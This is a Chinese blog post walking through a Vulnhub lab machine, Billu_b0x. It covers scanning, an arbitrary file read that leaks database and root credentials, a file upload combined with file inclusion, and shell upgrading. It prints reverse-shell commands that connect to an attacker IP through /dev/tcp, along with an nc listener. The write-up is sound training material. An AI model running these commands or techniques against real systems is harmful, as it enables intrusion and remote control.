<!-- build time:Mon Jul 17 2023 19:58:43 GMT+0800 (中国标准时间) --><!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"><meta name="theme-color" content="#FFF"><link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png"><link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="alternate" type="application/rss+xml" href="https://blog.xcu.icu/rss.xml"><link rel="alternate" type="application/atom+xml" href="https://blog.xcu.icu/atom.xml"><link rel="alternate" type="application/json" href="https://blog.xcu.icu/feed.json"><link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext"><link rel="stylesheet" href="/css/app.css?v=0.2.5"><meta name="keywords" content="Vulnhub"><link rel="canonical" href="https://blog.xcu.icu/2022/11/04/Billu_b0x%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/"><title>Billu_b0x打靶记录 - Vulnhub | ClownのBlog =</title><meta name="generator" content="Hexo 6.3.0"></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">Billu_b0x打靶记录</h1><div class="meta"><span class="item" title="创建时间：2022-11-04 00:00:00"><span class="icon"><i class="ic i-calendar"></i> </span><span class="text">发表于</span> <time itemprop="dateCreated datePublished" datetime="2022-11-04T00:00:00+08:00">2022-11-04</time> </span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i> </span><span class="text">本文字数</span> <span>6k</span> <span class="text">字</span> </span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i> </span><span class="text">阅读时长</span> <span>5 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span> <span class="line"></span> <span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">ClownのBlog</a></li></ul><ul class="right"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div id="imgs" class="pjax"><ul><li class="item" data-background-image="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/10.jpg"></li><li class="item" data-background-image="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/115.jpg"></li><li class="item" data-background-image="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/87.jpg"></li><li class="item" data-background-image="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/136.jpg"></li><li class="item" data-background-image="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/110.jpg"></li><li class="item" data-background-image="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/79.jpg"></li></ul></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"/></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"/><use xlink:href="#gentle-wave" x="48" y="3"/><use xlink:href="#gentle-wave" x="48" y="5"/><use xlink:href="#gentle-wave" x="48" y="7"/></g></svg></div><main><div class="inner"><div id="main" class="pjax"><div class="article wrap"><div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i> <span><a href="/">首页</a></span><i class="ic i-angle-right"></i> <span class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/Vulnhub/" itemprop="item" rel="index" title="分类于 Vulnhub"><span itemprop="name">Vulnhub</span></a><meta itemprop="position" content="1"></span></div><article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN"><link itemprop="mainEntityOfPage" href="https://blog.xcu.icu/2022/11/04/Billu_b0x%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/"><span hidden itemprop="author" itemscope itemtype="http://schema.org/Person"><meta itemprop="image" content="/images/avatar.jpg"><meta itemprop="name" content="Clown"><meta itemprop="description" content=", 一个妄想全栈web小废物"></span><span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization"><meta itemprop="name" content=""></span><div class="body md" itemprop="articleBody"><h2 id="billu_b0x打靶记录"><a class="anchor" href="#billu_b0x打靶记录">#</a> Billu_b0x 打靶记录</h2><h3 id="前言"><a class="anchor" href="#前言">#</a> 前言</h3><p>说起来应该算是第一次打这样的靶机，虽然没有独立完成，但是还是学到不少东西，也不知道算是什么难度的反正是看着网上大佬的方法打通了</p><h3 id="靶机说明"><a class="anchor" href="#靶机说明">#</a> 靶机说明</h3><p>目标是获取 root 权限</p><p>环境介绍：攻击机 win10、kail Linux</p><p>​ 靶机 billu_b0x (运行与 VMware 中)</p><p>网路设置：VM 中均为 Nat 连接模式（否则 nmap 扫不到存活主机）</p><h3 id="过程记录"><a class="anchor" href="#过程记录">#</a> 过程记录</h3><h4 id="信息收集"><a class="anchor" href="#信息收集">#</a> 信息收集</h4><p>启动靶机这不必多说</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220725200859598.png" alt="image-20220725200859598"></p><p>先用 nmap 扫描，找到这个靶机的 ip 地址</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220725201302238.png" alt="image-20220725201302238"></p><p>扫描这个网段存活主机</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220725201148762.png" alt="image-20220725201148762"></p><p>发现开放了 80 和 22 端口，那么 ssh 和 http 都有了先看看 80 都有什么</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220725202635615.png" alt="image-20220725202635615"></p><p>看到登录框，但是没有发现 SQL 注入，用 dirsearch 扫描</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220725202855639.png" alt="image-20220725202855639"></p><p>看到文件很多，先看看都是实现什么功能的</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220725202956010.png" alt="image-20220725202956010"></p><p>add 上传文件</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220725203042625.png" alt="image-20220725203042625"></p><p>head.php 是首页的背景图片</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220725203140837.png" alt="image-20220725203140837"></p><p>images 是三张图片没发现能利用的东西</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220725203252626.png" alt="image-20220725203252626"></p><p>phpmy 是 phpmyadmin 数据库工具</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220725211429058.png" alt="image-20220725211429058"></p><p>in.php 是 phpinfo，知道了 php 版本，暂时未发现作用</p><p>panel 会被重定向暂时不知道是什么</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220725203751630.png" alt="image-20220725203751630"></p><p>test 文件提示，要传参 file，感觉这里可能会有任意文件读取 get 传参没反应，post 传参读取 etc/password</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220725210934542.png" alt="image-20220725210934542"></p><p>读取成功，这里尝试读取其他文件</p><h4 id="任意文件读取利用"><a class="anchor" href="#任意文件读取利用">#</a> 任意文件读取利用</h4><p>add.php</p><pre><code class="language-php">&lt;?php
echo '&lt;form  method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;
    Select image to upload:
    &lt;input type=&quot;file&quot; name=image&gt;
	&lt;input type=text name=name value=&quot;name&quot;&gt;
	&lt;input type=text name=address value=&quot;address&quot;&gt;
	&lt;input type=text name=id value=1337 &gt;
    &lt;input type=&quot;submit&quot; value=&quot;upload&quot; name=&quot;upload&quot;&gt;
&lt;/form&gt;';

?&gt;
</code></pre><p>c.php（里面发现数据库的账号密码，可以使用）</p><pre><code class="language-php">&lt;?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );

ini_set( 'session.cookie_httponly', 1 );

$conn = mysqli_connect(&quot;127.0.0.1&quot;,&quot;billu&quot;,&quot;b0x_billu&quot;,&quot;ica_lab&quot;);

// Check connection
if (mysqli_connect_errno())
  &#123;
  echo &quot;connection failed -&gt;  &quot; . mysqli_connect_error();
  &#125;

?&gt;
</code></pre><p>show.php</p><pre><code class="language-php">&lt;?php
include('c.php');

if(isset($_POST['continue']))
&#123;
	$run='select * from users ';
	$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) &gt; 0) &#123;
echo &quot;&lt;table width=90% &gt;&lt;tr&gt;&lt;td&gt;ID&lt;/td&gt;&lt;td&gt;User&lt;/td&gt;&lt;td&gt;Address&lt;/td&gt;&lt;td&gt;Image&lt;/td&gt;&lt;/tr&gt;&quot;;
 while($row = mysqli_fetch_assoc($result)) 
   &#123;
	   echo '&lt;tr&gt;&lt;td&gt;'.$row['id'].'&lt;/td&gt;&lt;td&gt;'.htmlspecialchars ($row['name'],ENT_COMPAT).'&lt;/td&gt;&lt;td&gt;'.htmlspecialchars ($row['address'],ENT_COMPAT).'&lt;/td&gt;&lt;td&gt;&lt;img src=&quot;uploaded_images/'.htmlspecialchars ($row['image'],ENT_COMPAT).'&quot; height=90px width=100px&gt;&lt;/td&gt;&lt;/tr&gt;';
&#125;
   echo &quot;&lt;/table&gt;&quot;;
&#125;
&#125;

?&gt;
</code></pre><h4 id="法一ssh连接"><a class="anchor" href="#法一ssh连接">#</a> 法一，ssh 连接</h4><p>因为其 22 端口开放，读取 PHP 默认配置文件是 config.inc.php，Linux 系统路径结合 phpmy，./phpmy/config.inc.php 直接查看账户信息</p><pre><code class="language-php">&lt;?php

/* Servers configuration */
$i = 0;

/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;

/* End of servers configuration */

$cfg['DefaultLang'] = 'en-utf-8';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';


/* rajk - for blobstreaming */
$cfg['Servers'][$i]['bs_garbage_threshold'] = 50;
$cfg['Servers'][$i]['bs_repository_threshold'] = '32M';
$cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600;
$cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M';
?&gt;
</code></pre><p>看到 root 的账号密码用 ssh 连接</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220725212737642.png" alt="image-20220725212737642"></p><h4 id="法二文件上传"><a class="anchor" href="#法二文件上传">#</a> 法二，文件上传</h4><p>通过上面找到的账号密码登录 phpmyadmin</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220726101939920.png" alt="image-20220726101939920"></p><p>在 ica_lab 的数据库表中得到的用户名 biLLu 和密码 hEx_it</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220726102053357.png" alt="image-20220726102053357"></p><p>去在首页登录</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220726102217542.png" alt="image-20220726102217542"></p><p>跳转到 panel 页面</p><pre><code class="language-php">&lt;?php
session_start();

include('c.php');
include('head2.php');
if(@$_SESSION['logged']!=true )
&#123;
		header('Location: index.php', true, 302);
		exit();
	
&#125;



echo &quot;Welcome to billu b0x &quot;;
echo '&lt;form method=post style=&quot;margin: 10px 0px 10px 95%;&quot;&gt;&lt;input type=submit name=lg value=Logout&gt;&lt;/form&gt;';
if(isset($_POST['lg']))
&#123;
	unset($_SESSION['logged']);
	unset($_SESSION['admin']);
	header('Location: index.php', true, 302);
&#125;
echo '&lt;hr&gt;&lt;br&gt;';

echo '&lt;form method=post&gt;

&lt;select name=load&gt;
    &lt;option value=&quot;show&quot;&gt;Show Users&lt;/option&gt;
	&lt;option value=&quot;add&quot;&gt;Add User&lt;/option&gt;
&lt;/select&gt; 

 &amp;nbsp&lt;input type=submit name=continue value=&quot;continue&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;';
if(isset($_POST['continue']))
&#123;
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);
	
	if($choice==='add')
	&#123;
       		include($dir.'/'.$choice.'.php');
			die();
	&#125;
	
        if($choice==='show')
	&#123;
        
		include($dir.'/'.$choice.'.php');
		die();
	&#125;
	else
	&#123;
		include($dir.'/'.$_POST['load']);
	&#125;
	
&#125;


if(isset($_POST['upload']))
&#123;
	
	$name=mysqli_real_escape_string($conn,$_POST['name']);
	$address=mysqli_real_escape_string($conn,$_POST['address']);
	$id=mysqli_real_escape_string($conn,$_POST['id']);
	
	if(!empty($_FILES['image']['name']))
	&#123;
		$iname=mysqli_real_escape_string($conn,$_FILES['image']['name']);
	$r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION);
	$image=array('jpeg','jpg','gif','png');
	if(in_array($r,$image))
	&#123;
		$finfo = @new finfo(FILEINFO_MIME); 
	$filetype = @$finfo-&gt;file($_FILES['image']['tmp_name']);
		if(preg_match('/image\/jpeg/',$filetype )  || preg_match('/image\/png/',$filetype ) || preg_match('/image\/gif/',$filetype ))
				&#123;
					if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name']))
							 &#123;
							  echo &quot;Uploaded successfully &quot;;
							  $update='insert into users(name,address,image,id) values(\''.$name.'\',\''.$address.'\',\''.$iname.'\', \''.$id.'\')'; 
							 mysqli_query($conn, $update);
							  
							&#125;
				&#125;
			else
			&#123;
				echo &quot;&lt;br&gt;i told you dear, only png,jpg and gif file are allowed&quot;;
			&#125;
	&#125;
	else
	&#123;
		echo &quot;&lt;br&gt;only png,jpg and gif file are allowed&quot;;
		
	&#125;
&#125;
&#125;
?&gt;
</code></pre><p>通过文件读取获取 panel 的源码</p><p>文件上传部分仅允许上传图片文件，但是仅简单判断后缀名，尝试上传图片马文件</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220726103940791.png" alt="image-20220726103940791"></p><p>上传图片马</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220726103923536.png" alt="image-20220726103923536"></p><p>利用文件包含执行命令</p><p>反弹 shell kali 命令行里输入 nc -lvnp 6666 开始监听，同时 burp 的 post 请求中执行 echo &quot;bash -i &gt;&amp; /dev/tcp/192.168.161.143/6666 0&gt;&amp;1&quot; | bash，注意要将此命令先经过 URL 编码才能发送 (这个 ip 是攻击机的 IP 地址)</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220726110853078.png" alt="image-20220726110853078"></p><p>连接成功</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220726111050889.png" alt="image-20220726111050889"></p><p>提权显示需要终端，输入命令 python -c 'import pty;pty.spawn (&quot;/bin/bash&quot;)'</p><p><img data-src="https://note-1311335427.cos.ap-shanghai.myqcloud.com/images/image-20220726111155443.png" alt="image-20220726111155443"></p><p>python -c 'import pty;pty.spawn (&quot;/bin/bash&quot;)' 解释</p><p>当我们拿到一个 webshell 的时候，我们能够执行一些命令，但是这些命令都是非交互的，也就是说不存在上下文的概念。当我们想使用 vim、top 等命令时，webshell 就无能为力了。</p><p>一般我们都会使用 nc 来接收反弹来的 shell，只需要在目标上 (以 linux 为例) 执行：</p><pre><code class="language-bash">bash -i &gt;&amp; /dev/tcp/192.168.2.134/4444 0&gt;&amp;1
</code></pre><p>本地接收一下就 ok 了，但是反弹回来的 shell，或多或少都会存在问题，比如当我想使用 top 命令时就会提示没有 <code>tty</code> 。简单的来说就是没有上下文环境，这样的话， <code>vim</code> ， <code>sudo</code> 等操作都做不了，有时候还需要其他工具，很麻烦。</p><p>溢出提权</p><pre><code class="language-python">python -c 'import pty;pty.spawn(&quot;/bin/bash&quot;)'
</code></pre><p>来得到交互的 Shell, 一般的系统都默认安装 python</p><div class="tags"><a href="/tags/Vulnhub/" rel="tag"><i class="ic i-tag"></i> Vulnhub</a></div></div><footer><div class="meta"><span id="2022/11/04/Billu_b0x打靶记录/" class="item leancloud_visitors" data-flag-title="Billu_b0x打靶记录" title="阅读次数"><span class="icon"><i class="ic i-eye"></i> </span><span class="text">阅读次数</span> <span class="leancloud-visitors-count"></span> <span class="text">次</span></span></div><div id="copyright"><ul><li class="author"><strong>本文作者： </strong>Clown <i class="ic i-at"><em>@</em></i></li><li class="link"><strong>本文链接：</strong> <a href="https://blog.xcu.icu/2022/11/04/Billu_b0x%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" title="Billu_b0x打靶记录">https://blog.xcu.icu/2022/11/04/Billu_b0x打靶记录/</a></li><li class="license"><strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2022/11/03/DNS%E6%9C%8D%E5%8A%A1%E5%99%A8%E9%85%8D%E7%BD%AE/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;note-1311335427.cos.ap-shanghai.myqcloud.com&#x2F;images&#x2F;75.jpg" title="DNS服务器"><span class="type">上一篇</span> <span class="category"><i class="ic i-flag"></i> 网络服务应用</span><h3>DNS服务器</h3></a></div><div class="item right"><a href="/2022/11/05/phpfilter%E7%9A%84%E7%BB%95exit/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;note-1311335427.cos.ap-shanghai.myqcloud.com&#x2F;images&#x2F;11.jpg" title="php:&#x2F;&#x2F;filter过exit"><span class="type">下一篇</span> <span class="category"><i class="ic i-flag"></i> Web</span><h3>php://filter过exit</h3></a></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#billu_b0x%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95"><span class="toc-number">1.</span> <span class="toc-text">Billu_b0x 打靶记录</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9D%B6%E6%9C%BA%E8%AF%B4%E6%98%8E"><span class="toc-number">1.2.</span> <span class="toc-text">靶机说明</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%87%E7%A8%8B%E8%AE%B0%E5%BD%95"><span class="toc-number">1.3.</span> <span class="toc-text">过程记录</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.3.1.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%88%A9%E7%94%A8"><span class="toc-number">1.3.2.</span> <span class="toc-text">任意文件读取利用</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%95%E4%B8%80ssh%E8%BF%9E%E6%8E%A5"><span class="toc-number">1.3.3.</span> <span class="toc-text">法一，ssh 连接</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%95%E4%BA%8C%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="toc-number">1.3.4.</span> <span class="toc-text">法二，文件上传</span></a></li></ol></li></ol></li></ol></div><div class="related panel pjax" data-title="系列文章"><ul><li class="active"><a href="/2022/11/04/Billu_b0x%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" rel="bookmark" title="Billu_b0x打靶记录">Billu_b0x打靶记录</a></li><li><a href="/2023/07/11/%E8%AE%B0%E4%B8%80%E6%AC%A1%E5%8F%A4%E8%80%81%E7%9A%84%E9%9D%B6%E6%9C%BAmedium_socnet%E7%9A%84%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" rel="bookmark" title="记一次古老的靶机medium_socnet的打靶记录">记一次古老的靶机medium_socnet的打靶记录</a></li><li><a href="/2023/07/14/easy_cloudantivirus%E9%9D%B6%E6%9C%BA%E6%94%BB%E5%87%BB%E8%AE%B0%E5%BD%95/" rel="bookmark" title="记一次easy_cloudantivirus打靶记录">记一次easy_cloudantivirus打靶记录</a></li><li><a href="/2023/07/15/Chronos%E7%9A%84%E9%9D%B6%E6%9C%BA%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" rel="bookmark" title="Chronos的靶机打靶记录">Chronos的靶机打靶记录</a></li><li><a href="/2023/07/16/hard_socnet2%E9%9D%B6%E6%9C%BA%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" rel="bookmark" title="hard_socnet2的靶机打靶记录">hard_socnet2的靶机打靶记录</a></li></ul></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person"><img class="image" itemprop="image" alt="Clown" data-src="/images/avatar.jpg"><p class="name" itemprop="name">Clown</p><div class="description" itemprop="description">一个妄想全栈web小废物</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">57</span> <span class="name">文章</span></a></div><div class="item categories"><a href="/categories/"><span class="count">12</span> <span class="name">分类</span></a></div><div class="item tags"><a href="/tags/"><span class="count">40</span> <span class="name">标签</span></a></div></nav><div class="social"><span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL2Nsb3duLXE=" title="https:&#x2F;&#x2F;github.com&#x2F;clown-q"><i class="ic i-github"></i></span> <span class="exturl item email" data-url="bWFpbHRvOjI2NDIxMzczNjVAcXEuY29t" title="mailto:2642137365@qq.com"><i class="ic i-envelope"></i></span></div><ul class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item"><a href="/about/" rel="section"><i class="ic i-user"></i>关于</a></li><li class="item dropdown"><a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a><ul class="submenu"><li class="item"><a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a></li><li class="item"><a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a></li><li class="item"><a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a></li></ul></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-heart"></i>friends</a></li><li class="item"><a href="/links/" rel="section"><i class="ic i-magic"></i>links</a></li></ul></div></div></div><ul id="quick"><li class="prev pjax"><a href="/2022/11/03/DNS%E6%9C%8D%E5%8A%A1%E5%99%A8%E9%85%8D%E7%BD%AE/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2022/11/05/phpfilter%E7%9A%84%E7%BB%95exit/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"><a href="/categories/Web/" title="分类于 Web">Web</a></div><span><a href="/2023/03/01/nosql/" title="nosql学习笔记">nosql学习笔记</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/WP/" title="分类于 WP">WP</a></div><span><a href="/2022/09/23/ISCC2022/" title="ISCC2022">ISCC2022</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E6%9D%82%E8%AE%B0/" title="分类于 杂记">杂记</a></div><span><a href="/2022/10/24/%E8%87%AA%E7%94%A8%E4%B8%80%E4%BA%9B%E7%AE%80%E5%8D%95%E8%84%9A%E6%9C%AC%E8%AE%B0%E5%BD%95/" title="自用一些简单脚本记录">自用一些简单脚本记录</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/CTFshow/" title="分类于 CTFshow">CTFshow</a></div><span><a href="/2022/11/01/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E8%A1%A5%E5%85%85/" title="CTFshow-web入门命令执行补充">CTFshow-web入门命令执行补充</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E6%9D%82%E8%AE%B0/" title="分类于 杂记">杂记</a></div><span><a href="/2022/10/25/hexo+github%E6%90%AD%E5%BB%BA%E4%B8%AA%E4%BA%BA%E5%8D%9A%E5%AE%A2/" title="hexo+github搭建个人博客">hexo+github搭建个人博客</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Web/" title="分类于 Web">Web</a></div><span><a href="/2022/10/31/CSRF&SSRF/" title="CSRF&amp;SSRF">CSRF&SSRF</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/java%E5%AE%89%E5%85%A8/" title="分类于 java安全">java安全</a></div><span><a href="/2023/04/14/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" title="java反序列化">java反序列化</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Web/" title="分类于 Web">Web</a></div><span><a href="/2023/03/20/%E8%A2%AB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" title="被动信息收集">被动信息收集</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Vulnhub/" title="分类于 Vulnhub">Vulnhub</a></div><span><a href="/2023/07/15/Chronos%E7%9A%84%E9%9D%B6%E6%9C%BA%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" title="Chronos的靶机打靶记录">Chronos的靶机打靶记录</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Web/" title="分类于 Web">Web</a></div><span><a href="/2022/10/24/awd-web%E5%B0%8F%E7%BB%93/" title="Awd-web小结">Awd-web小结</a></span></li></ul></div><div><h2>最新评论</h2><ul class="leancloud-recent-comment"></ul></div></div><div class="status"><div class="copyright">&copy; 2010 – <span itemprop="copyrightYear">2023</span> <span class="with-love"><i class="ic i-sakura rotate"></i> </span><span class="author" itemprop="copyrightHolder">Clown @ ClownのBlog</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i> </span><span title="站点总字数">590k 字</span> <span class="post-meta-divider">|</span> <span class="post-meta-item-icon"><i class="ic i-coffee"></i> </span><span title="站点阅读时长">8:57</span></div><div class="powered-by">基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span></div></div></div></footer></div><script data-config type="text/javascript">var LOCAL={path:"2022/11/04/Billu_b0x打靶记录/",favicon:{show:"（●´3｀●）やれやれだぜ",hide:"(´Д｀)大変だ！"},search:{placeholder:"文章搜索",empty:"关于 「 ${query} 」，什么也没搜到",stats:"${time} ms 内找到 ${hits} 条结果"},valine:!0,fancybox:!0,copyright:'复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',ignores:[function(e){return e.includes("#")},function(e){return new RegExp(LOCAL.path+"$").test(e)}]}</script><script src="https://cdn.polyfill.io/v2/polyfill.js"></script><script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script><script src="/js/app.js?v=0.2.5"></script></body></html><!-- rebuild by hrmmi -->